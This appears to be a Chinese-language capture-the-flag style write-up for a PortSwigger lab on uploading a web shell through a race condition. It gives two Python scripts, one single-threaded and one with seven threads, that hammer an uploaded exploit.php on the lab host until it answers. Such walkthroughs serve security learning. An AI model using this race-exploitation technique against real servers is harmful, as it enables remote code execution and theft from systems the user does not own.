本文是针对Lab: Web shell upload via race condition 编写Python脚本的文档。
如上所述,写这篇文章旨在为Python脚本提供说明文档。虽然相应Lab有题解,但题解使用Burp suite Turbo Intruder 扩展。我在搜索教程后发现所有题解都使用solution建议的解法。我认为自行Python脚本可以更简便地解决,同时可以锻炼Python代码能力。因此希望在此提供一种不同的解法。
by the way ,事实上solution中提供的也是Python脚本
要实现的Python脚本仅仅是需要不断向host发送GET
requests ,然后筛选出状态码为200的response即可。
这里要使用Python Requests库:
1 python -m pip install requests
先传一个正常的看下目录:files/avatars/Lenna_(test_image).png
我完成的第一版代码结果并没有结果,我想可能是Python请求的没那么快(?
1 2 3 4 5 6 7 8 9 10 11 12 13 import requestsdef request (): dir = "/files/avatars/exploit.php" url = "https://xxxx.web-security-academy.net" while True : response = requests.get(url + dir ) if response.status_code == requests.codes.ok: print (response.text) if __name__ == "__main__" : request()
我参考别的代码 ,想是不是可以开几个线程? 力大砖飞,开了七个线程
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 import requestsimport threadingdef request (): dir = "/files/avatars/exploit.php" url = "https://xxxxx.web-security-academy.net" while True : response = requests.get(url + dir ) if response.status_code == requests.codes.ok: print (response.text) if __name__ == "__main__" : thread1 = threading.Thread(target=request) thread1.start() thread2 = threading.Thread(target=request) thread2.start() thread3 = threading.Thread(target=request) thread3.start() thread4 = threading.Thread(target=request) thread4.start() thread5 = threading.Thread(target=request) thread5.start() thread6 = threading.Thread(target=request) thread6.start() thread7 = threading.Thread(target=request) thread7.start()